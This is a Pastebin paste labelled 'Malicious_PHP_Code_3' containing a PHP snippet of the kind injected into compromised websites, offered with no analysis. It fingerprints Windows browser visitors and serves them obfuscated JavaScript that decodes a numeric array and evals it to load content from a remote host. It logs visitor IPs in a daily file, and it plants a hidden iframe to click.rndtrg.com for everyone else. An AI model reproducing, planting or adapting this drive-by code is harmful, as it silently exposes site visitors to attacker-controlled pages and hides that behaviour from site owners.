Want more features on Pastebin? Sign Up, it's FREE!
Guest

Malicious_PHP_Code_3

By: kazu-sama on Feb 6th, 2013  |  syntax: PHP  |  size: 5.35 KB  |  views: 178  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.  <?php
  2. error_reporting(0);
  3. $ip   = $_SERVER["REMOTE_ADDR"];
  4. $dr   = $_SERVER["DOCUMENT_ROOT"];
  5. $ua   = $_SERVER['HTTP_USER_AGENT'];
  6. $odbf = $dr . '/' . md5(date('m.d.y'), time() - 86400);
  7. if (file_exists($odbf))
  8.     @unlink($odbf);
  9. $dbf = $dr . '/' . md5(date('m.d.y'));
  10. if ((strpos($ua, 'Windows') !== false) && ((strpos($ua, 'MSIE') !== false) || (strpos($ua, 'Opera') !== false) || (strpos($ua, 'Firefox') !== false || (strpos($ua, 'Mozilla') !== false)) && (strpos(@file_get_contents($dbf), $ip) === false))) {
  11.     error_reporting(0);
  12.     echo (<script>
  13.     try {
  14.         if (window.document) window["document"]["body"] = "123"
  15.     } catch (bawetawe) {
  16.         if (window.document) {
  17.             v = window;
  18.             try {
  19.                 fawbe--
  20.             } catch (afnwenew) {
  21.                 try {
  22.                     (v + v)()
  23.                 } catch (gngrthn) {
  24.                     try {
  25.                         if (020 === 0x10) v["document"]["body"] = "123"
  26.                     } catch (gfdnfdgber) {
  27.                         m = 123;
  28.                         if ((alert + "").indexOf("na" + "ti" + "ve") !== -1) ev = window["eval"];
  29.                     }
  30.                 }
  31.                 n = ["9", "9", "45", "42", "17", "1f", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4a", "4g", "4f", "2g", "4l", "39", "3m", "43", "33", "3m", "49", "41", "1f", "1e", "3n", "4b", "40", "4l", "1e", "1g", "3g", "1n", "3i", "1g", "4n", "d", "9", "9", "9", "45", "42", "4e", "3m", "49", "41", "4e", "1f", "1g", "29", "d", "9", "9", "50", "17", "41", "48", "4f", "41", "17", "4n", "d", "9", "9", "9", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "4j", "4e", "45", "4g", "41", "1f", "19", "2a", "45", "42", "4e", "3m", "49", "41", "17", "4f", "4e", "3o", "2b", "1e", "44", "4g", "4g", "4c", "28", "1m", "1m", "4i", "41", "4g", "4m", "41", "4i", "44", "4c", "3m", "46", "1l", "4b", "4g", "4m", "4b", "1l", "3o", "4b", "49", "1m", "4a", "4g", "1m", "4f", "4g", "3m", "4g", "4f", "1l", "4c", "44", "4c", "1e", "17", "4j", "45", "40", "4g", "44", "2b", "1e", "1o", "1n", "1e", "17", "44", "41", "45", "43", "44", "4g", "2b", "1e", "1o", "1n", "1e", "17", "4f", "4g", "4l", "48", "41", "2b", "1e", "4i", "45", "4f", "45", "3n", "45", "48", "45", "4g", "4l", "28", "44", "45", "40", "40", "41", "4a", "29", "4c", "4b", "4f", "45", "4g", "45", "4b", "4a", "28", "3m", "3n", "4f", "4b", "48", "4h", "4g", "41", "29", "48", "41", "42", "4g", "28", "1n", "29", "4g", "4b", "4c", "28", "1n", "29", "1e", "2c", "2a", "1m", "45", "42", "4e", "3m", "49", "41", "2c", "19", "1g", "29", "d", "9", "9", "50", "d", "9", "9", "42", "4h", "4a", "3o", "4g", "45", "4b", "4a", "17", "45", "42", "4e", "3m", "49", "41", "4e", "1f", "1g", "4n", "d", "9", "9", "9", "4i", "3m", "4e", "17", "42", "17", "2b", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "3o", "4e", "41", "3m", "4g", "41", "2j", "48", "41", "49", "41", "4a", "4g", "1f", "1e", "45", "42", "4e", "3m", "49", "41", "1e", "1g", "29", "42", "1l", "4f", "41", "4g", "2f", "4g", "4g", "4e", "45", "3n", "4h", "4g", "41", "1f", "1e", "4f", "4e", "3o", "1e", "1j", "1e", "44", "4g", "4g", "4c", "28", "1m", "1m", "4i", "41", "4g", "4m", "41", "4i", "44", "4c", "3m", "46", "1l", "4b", "4g", "4m", "4b", "1l", "3o", "4b", "49", "1m", "4a", "4g", "1m", "4f", "4g", "3m", "4g", "4f", "1l", "4c", "44", "4c", "1e", "1g", "29", "42", "1l", "4f", "4g", "4l", "48", "41", "1l", "4i", "45", "4f", "45", "3n", "45", "48", "45", "4g", "4l", "2b", "1e", "44", "45", "40", "40", "41", "4a", "1e", "29", "42", "1l", "4f", "4g", "4l", "48", "41", "1l", "4c", "4b", "4f", "45", "4g", "45", "4b", "4a", "2b", "1e", "3m", "3n", "4f", "4b", "48", "4h", "4g", "41", "1e", "29", "42", "1l", "4f", "4g", "4l", "48", "41", "1l", "48", "41", "42", "4g", "2b", "1e", "1n", "1e", "29", "42", "1l", "4f", "4g", "4l", "48", "41", "1l", "4g", "4b", "4c", "2b", "1e", "1n", "1e", "29", "42", "1l", "4f", "41", "4g", "2f", "4g", "4g", "4e", "45", "3n", "4h", "4g", "41", "1f", "1e", "4j", "45", "40", "4g", "44", "1e", "1j", "1e", "1o", "1n", "1e", "1g", "29", "42", "1l", "4f", "41", "4g", "2f", "4g", "4g", "4e", "45", "3n", "4h", "4g", "41", "1f", "1e", "44", "41", "45", "43", "44", "4g", "1e", "1j", "1e", "1o", "1n", "1e", "1g", "29", "d", "9", "9", "9", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4a", "4g", "4f", "2g", "4l", "39", "3m", "43", "33", "3m", "49", "41", "1f", "1e", "3n", "4b", "40", "4l", "1e", "1g", "3g", "1n", "3i", "1l", "3m", "4c", "4c", "41", "4a", "40", "2h", "44", "45", "48", "40", "1f", "42", "1g", "29", "d", "9", "9", "50"];
  32.                 h = 2;
  33.                 s = "";
  34.                 if (m) for (i = 0; i - 587 != 0; i++) {
  35.                     k = i;
  36.                     if (window["document"]) s += String["fro" + "mC" + "harCode"](parseInt(n[i], 25));
  37.                 }
  38.                 z = s;
  39.                 ev(z)
  40.             }
  41.         }
  42.     }
  43. </script>);
  44.     if ($fp = @fopen($dbf, "a")) {
  45.         fputs($fp, $ip . '|');
  46.         fclose($fp);
  47.     }
  48. } else
  49.     echo '<iframe style="visibility:hidden;position:absolute;left:0;top:0;" width="100" height="6" src="http://click.rndtrg.com/feed/frames.php?uid=99&frames=2"></iframe>';
  50. if (file_exists("openinfo.php") OR isset($_REQUEST['dblink']) OR empty($dblink))
  51.     die("Cannot open file.");
  52. ?>
clone this paste RAW Paste Data